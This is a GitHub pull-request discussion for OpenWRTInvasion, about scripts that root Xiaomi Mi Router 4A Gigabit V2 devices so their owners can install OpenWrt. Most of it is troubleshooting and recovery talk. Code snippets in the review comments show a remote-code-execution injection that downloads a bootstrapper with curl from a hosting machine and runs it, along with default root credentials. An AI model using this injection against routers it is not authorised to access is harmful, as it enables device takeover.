Exploit scripts for the V2 of the Router with Firmware 2.30.20 #155
Conversation
Testscript not needed
Testscript not needed
|
I am R4A with Firmware 2.30.28. What should I do? |
|
@ViceEye your Router IP address should be 192.168.31.1, this is xiaomi default router address. |
I change the Router to extender mode, so it can get online (I don't have long cable yet), before I do this, it was not working too |
|
|
|
@ViceEye seems you are not login to your xiaomi router (192.168.31.1) admin page on a browser before you |
|
I am logged in, on my browser tho, let me retry. Does {"code": 0} mean successful exploit |
|
{"code": 0}, --- I donot know this. |
|
Fixed, found out that WSL cannot do this!!! And this way is working under Windows env, so remove the os check in the script and it's work now |
|
Wait, you've started the script in the windows linux env? I haven't tried this one tbh. But we are also talking about a VM when I look at the 172.xxx.xxx.xxx address. I remove the os check, not a problem, but with VMs, this would be way harder. |
…g condition if the router starts dropbear fast or slow somehow. The script was extended with logouts into /tmp/exploit.log - the script was executed multiple times in a row without dropping out too soon.
|
Also, here is the output of a successfull injection: Above the Telnet should work as soon as you see the download worked of the 2 files and the script ended, even with an error saying ssh is not open. Try telnet. I executed the exploit multiple times in a row, even with a fresh rebooted router. |
|
Thanks for this 🔥 Couple of things:
|
|
If the original script had been a class I could use or extend from, that would be no problem. But remember, you access variables of the same instance, when I use access the function, the variable will be empty. And melting everything into one and let people decide is not really a good idea. The users are overwhelmed with the options and setup they have to do right now, knowing which exploit to use would only open more tickets. We could remove your original script, if the other exploit works on older routers too. |
|
@LordPinhead Unfortunately, I flashed again with the newest SNAPSHOT (r21150-63db906516). @acecilia And now my router starts with a solid orange light and light will be off and on looping forever. IP:192.168.31.1 disappeared. What I guess is that I need to debrick my device. I have tried 1) Mi Wifi Repair tool, 2) TinyPXE4A. Both methods are NOT successfully debrick my device. I have tried different factory firmwae 2.28.xx and 2.18.28.bin. I guess that the bin file needs to be 2.30.20 for V2, however I cannot find any place where I can download this version of firmware. (There is the 3rd method: micky0867 bootp/tftp-server procedure. However, bootp is not found anywhere to download. I could not try this method.) I had realized my stupidity and carelessness cost me a lot of effort trying to save this device. and I had concluded to a point to I need your help. and I believe there will be others who will suffer from the same mistakes. With your help, it will help tremendously! Do you think all I need is actually the 2.30.20.bin file? Any direction I could go? Thank you very much, @LordPinhead @acecilia |
|
@MrTaiKe well, there are no official OpenWRT builds for this device - you've flashed an unsupported firmware for a different router, and bricked your device. V1 and V2 are different, and firmwares for them are not compatible. And there is no publicly available stock firmware for this device online as far as I know. I hope you have made a full backup of |
@vanyasem Thank you for your reply. I understood V1 and V2 are different. I used @LordPinhead's code (commit #99634522) and successfully flash OpenWrt onto it. OpenWrt 22.03.2 Sysupgrade was actually working on this device except WiFi features were missing. I was dumb enough to think SNAPSHOT might contain wireless package, and flashing with latest snapshot which eventually bricked my device :( OH MY GOD, I do not have any mt0. Do you think I can use someone else's mt0, or I will have to just wait for the stock firmware 2.30.20 made publicly available ? Thank you again |
|
@MrTaiKe |
@410252889 |
|
@410252889 非常感謝您的幫助, 您是救世主!! @LordPinhead @vanyasem @acecilia
By the way, this is a great community place! |
@RadioOperator Thank you for pointing out the AC1200/RB02. I have read thru the entire thread of #141. Looks like @wbs306 #141 (comment) compiled a new openwrt firmware for R4AV2. Did anyone try to use @LordPinhead's code (commit #99634522) to flash @wbs306's compiled openwork? @wbs306 would you please point out where I can find your compiled R4AV2 Openwrt? I can test it out. Btw, in spite to the HW difference between V1 and V2, it is very strange to me that I was able to successfully flash R4AV2 device with OpenWrt 22.03.2 Sysupgrade firmware (as I mention earlier) |
|
you already know using the official build got the wifi problem because of the different chip. |
Sorry that I am a newbie trying to learn many things in a short time. I kind of got what you saying. So assuming or if the major HW difference are just the WiFi chips, then the official build could be modified just the codings for the wireless chips? I am kind of surprised that I was able to flash it. It seems to me that the system had not changed much except the wireless chips. Correct me if I am wrong? Thanks! I am guessing that it might retain most of original R4A Hardware except using the AC1200 wireless chips. |
Device is the same as Xiaomi Mi Router 4A Gigabit, except of: - 5G WiFi is MT7663 - addresses of leds, wifi and eth ports are slightly changed Specs: SoC: MT7621 CPU: 2 x 880 MHz ROM: 16 MB RAM: 128 MB WLAN: MT7603, MT7663 MAC addresses: WAN **** factory 0xe006 (label) LAN *:f7 factory 0xe000 2.4 GHz *:f8 factory 0x0000+0x4 (mtd-eeprom+0x4) 5 GHz *:f9 factory 0x8000+0x4 (mtd-eeprom+0x4) Installation: Factory firmware is based on a custom OpenWrt 17.x. Installation is the same as for Xiaomi Mi Router 4A Gigabit. Probably the easiest way to install is to use the script from this repository: acecilia/OpenWRTInvasion#155 In a more advanced case, you can do everything yourself: - gain access to the device through one of the exploits described in the link above - upload sysupgrade image to /tmp - overwrite stock firmware: # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1 Recovery: Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit. Possible options can be found here: https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition One of the ways is to use another router with OpenWrt: - connect both routers by their LAN ports - download stock firmware from [1] - place it inside /tmp/test.bin on the main router - configure PXE/TFTP on the main router - power off 4Av2, hold Reset button, power on - as soon as image download via TFTP starts, Reset can be released - blinking blue wan LED will indicate the end of the flashing process, now router can be rebooted [1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin Signed-off-by: Dmitry Sokolov <[email protected]>
Device is the same as Xiaomi Mi Router 4A Gigabit, except of: - 5G WiFi is MT7663 - addresses of leds, wifi and eth ports are slightly changed Specs: SoC: MT7621 CPU: 2 x 880 MHz ROM: 16 MB RAM: 128 MB WLAN: MT7603, MT7663 MAC addresses: WAN **** factory 0xe006 (label) LAN *:f7 factory 0xe000 2.4 GHz *:f8 factory 0x0000+0x4 (mtd-eeprom+0x4) 5 GHz *:f9 factory 0x8000+0x4 (mtd-eeprom+0x4) Installation: Factory firmware is based on a custom OpenWrt 17.x. Installation is the same as for Xiaomi Mi Router 4A Gigabit. Probably the easiest way to install is to use the script from this repository: acecilia/OpenWRTInvasion#155 In a more advanced case, you can do everything yourself: - gain access to the device through one of the exploits described in the link above - upload sysupgrade image to /tmp - overwrite stock firmware: # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1 Recovery: Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit. Possible options can be found here: https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition One of the ways is to use another router with OpenWrt: - connect both routers by their LAN ports - download stock firmware from [1] - place it inside /tmp/test.bin on the main router - configure PXE/TFTP on the main router - power off 4Av2, hold Reset button, power on - as soon as image download via TFTP starts, Reset can be released - blinking blue wan LED will indicate the end of the flashing process, now router can be rebooted [1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin Signed-off-by: Dmitry Sokolov <[email protected]>
|
Hello @MrTaiKe I really need an OpenVPN client on my router but with the working mentioned release there is "not compatible with the kernel" error when I try to install OpenVPN packages. can you please tell me how should I fix this issue? |
Hi, @nourymcu, Sounds like you have no problem with Openwrt. Now, You problem is that you can't install openvpn onto Openwrt. To answer your question quickly, you might want to refer this post, https://forum.openwrt.org/t/openvpn-openssl-package/83425/4 , Scroll down and pay attention to what MPA replied to Hyper: Since you have to resolve the dependencies issues, you can give a quick try with force install package, but you might run into another issues. your luck is small. So I probably would stick with One of mpa's recommendation which is to get the source code that was used to build the image, then rebuild the image and packages yourself. That being said, you could fork my depository, reuse my ACTION workflow, add openvpn pack modifying Opwrt-R4AGv2.config to build a new image. If image is compiled successfully, OpenVpn should be included with compatible kernel. (you MUST pay attention new image not exceeding your internal memory size ~12MB? I forget...) Hope this help you!
|
|
I was offline for some time because I moved into a new home, but I simply moved the script into the original one. The exploit works on every version, even old ones, so it's not wrong. I exploited 8 routers successfully, 2 with real old firmware versions. |
|
I really appreciate the amount of work that you guys put in to this project to get the most out of this router. so thank you all for that. but only if the device had a usb port my router would be functional now😁 |
| router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address | ||
|
|
||
| # get stok | ||
| sys.exit("Stopping: script can only be run on a Mac/Linux system") |
There was a problem hiding this comment.
Is this intentional? Windows support is being dropped again?
There was a problem hiding this comment.
If you have a Windows system, remove the code and try it. I have no Windows that was working with it, and when I have to give it to somebody without much knowledge, a live disk in VMWare would be easier.
| @@ -50,7 +67,8 @@ def get_stok(router_ip_address): | |||
| return None | |||
| key = re.findall(r'key: \'(.*)\',', r0.text)[0] | |||
| nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000)) | |||
| router_password = input("Enter router admin password: ") | |||
| router_password = "12345678" | |||
| router_password = input("Enter router admin password: '{}']: ".format(router_password)) or router_password | |||
There was a problem hiding this comment.
What is this hardcoded password?
There was a problem hiding this comment.
It's not "hardcoded" - it's initialized and a user could change it. I used 12345678 for the tests and with the placeholder, I did not have to enter it all the time.
| exploit_cmd += "curl -s http://{}:{}/bootstrapper_v2.sh > bootstrapper.sh && ".format(hosting_ip, http_port_number) | ||
| exploit_cmd += "/bin/ash /tmp/bootstrapper.sh".format(hosting_ip, http_port_number, hosting_ip, http_port_number) | ||
|
|
||
|
|
|
|
||
| if checkHost(router_ip_address, 22): | ||
| print("done! Now you can connect to the router using several options: (user: root, password: root)") | ||
| print("* telnet {}".format(router_ip_address)) | ||
| print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address)) |
There was a problem hiding this comment.
Why is oHostKeyAlgorithms=+ssh-rsa gone?
There was a problem hiding this comment.
Why is it needed in the first place? The ssh client does the handshake and got the right cipher and algorithms.
`
debug1: Remote protocol version 2.0, remote software version dropbear
debug1: compat_banner: no match: dropbear
debug1: Authenticating to hella:22 as root
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: [email protected] MAC: compression: none
debug1: kex: client->server cipher: [email protected] MAC: compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:vFou7A4lAJIvzCPMb1ds1Eve7pMZ2z4YNDGTpz48S+4
debug1: Host hella is known and matches the ED25519 host key.
`
running successful on Windows! |
|
发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址: http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin 2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh
|
|
小米路由器4A千兆版v2(r4ag v2)官方snapshots固件可以用, 但是5g wifi只有3db, 改几次5g参数WiFi就会消失需要重启路由器. |
|
this exploit doesn't work on r4acv2, but the current one does. it'd be incorrect to completely replace the current exploit |
|
whene I use this exploit only by input the stock adreess ( dose'nt work by ip address) , that show every thing is corect , but i could not conect by cyber to upload openwrt image to my router to continue the process |
hi bro can you discibe that how ? |
This is something I could not find out why this happens. Sometimes, the Dropbear SSH Server takes too long to start and even with a pause of 3 minutes, the connection was unsuccessful. But with the second time it works. Even on a shell I couldn't see why it behaves like this.
But I have the V2 and it worked.
3 of them and they had the 2.30.20 Firmware with the exploit. If you have a newer one in which this one is fixed and the other one works, my first one would be the best option, even when the code is doubled. Or somebody has the time to make modules and remove the double code from the scripts, I don't have it. |
My R4A gigabite edition flash is Winboard 250128JVSQ |
|
Edit: Man, I have been trying for days to get telnet working. I have Xiaomi 4A Gigabit V2, chinese version. Updated it to the latest firmware 2.30.500 and followed everyone posts. I am running the scripts through VM linux Ubuntu. The script grabs the stok, but the script just won't work to enable telnet. |
i check this script in both system ( in linux pc & vm run in windows). but unfortunetly has not worked yet :( |
that's r4a gigabit (r4av2?), and i have the regular r4a (r4acv2) |
|
lastly I can do it |
Device is the same as Xiaomi Mi Router 4A Gigabit, except of: - 5G WiFi is MT7663 - addresses of leds, wifi and eth ports are slightly changed Specs: SoC: MT7621 CPU: 2 x 880 MHz ROM: 16 MB RAM: 128 MB WLAN: MT7603, MT7663 MAC addresses: WAN **** factory 0xe006 (label) LAN *:f7 factory 0xe000 2.4 GHz *:f8 factory 0x0000+0x4 (mtd-eeprom+0x4) 5 GHz *:f9 factory 0x8000+0x4 (mtd-eeprom+0x4) Installation: Factory firmware is based on a custom OpenWrt 17.x. Installation is the same as for Xiaomi Mi Router 4A Gigabit. Probably the easiest way to install is to use the script from this repository: acecilia/OpenWRTInvasion#155 In a more advanced case, you can do everything yourself: - gain access to the device through one of the exploits described in the link above - upload sysupgrade image to /tmp - overwrite stock firmware: # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1 Recovery: Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit. Possible options can be found here: https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition One of the ways is to use another router with OpenWrt: - connect both routers by their LAN ports - download stock firmware from [1] - place it inside /tmp/test.bin on the main router - configure PXE/TFTP on the main router - power off 4Av2, hold Reset button, power on - as soon as image download via TFTP starts, Reset can be released - blinking blue wan LED will indicate the end of the flashing process, now router can be rebooted [1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin Signed-off-by: Dmitry Sokolov <[email protected]> (cherry picked from commit 39e4f03)
|
hello everyone . I have R4AGv2 with 2.30.25 firmware . How can I install openwrt on my router ? is this possible or not because in openwrt site I see this : Warning 10/2022 Xiaomi is currently shipping v2 of the 4A Gigabit Edition, it's identifiable by fw version 2.30.20, and the name when assigned an IP from a DHCP (not your ISPs) via the WAN port, MiWiFi-R4AV2. This model cannot be flashed with Openwrt. |
|
特别感谢 @kokutoukiritsugu ,用这个方法,成功解锁 telnet/ssh,需要严格按阁下提供的操作步骤,我的步骤如下,供大家参考
|
|
Just a really important information, I received a device with 2.30.500 and don't work not matter what, I see the default DHCP range was changed to use high port, change to use this and you are good to go:
Maybe make sense to verify the machine IP and show a warning?
|
I failed forever like this as well. But after doing a change in with web_server:
# upload and execute payload
print("start uploading payload file...")
payload_download = requests.get(create_exploit_url(web_server.port))
print(payload_download.text)
+ import time
+ time.sleep(5)Then it works. So looks like my PC is too fast and making the service quits too early. |
|
Script work flawlessly on Mi Router AC1200 RB02 with international firmware 3.0.61 |
|
@webysther's suggestion (changing DHCP pool) combined with using LordPinhead's latest worked perfectly on the exploit side. Weirdly, ftp refused to let me push the firmware to /tmp, but I was able to get in via telnet and then wget the payload instead. |
Great! About FTP, for me only works telnet also. |
Setup I used is router IP 192.168.31.1, computer IP 192.168.31.2, Password for the webinterface is 12345678, these are the default values.
The exploit is based on vanyasem (#141 (comment)) findings and his comment in issue 141.
Start remote_command_execution_vulnerability_v2.py with python3, this will ask for the router ip, the local ip and the webinterface password (default values are set), then it will pack a payload like before, a bootstrapper and it will be injected into the set_config_iotdev url. Basically, remote code execution.
It needs the dropbear and busybox executable plus the script. Because it was so different, I made a new python script and a new bash script.
Now, with root access, the router is also open for OpenWRT.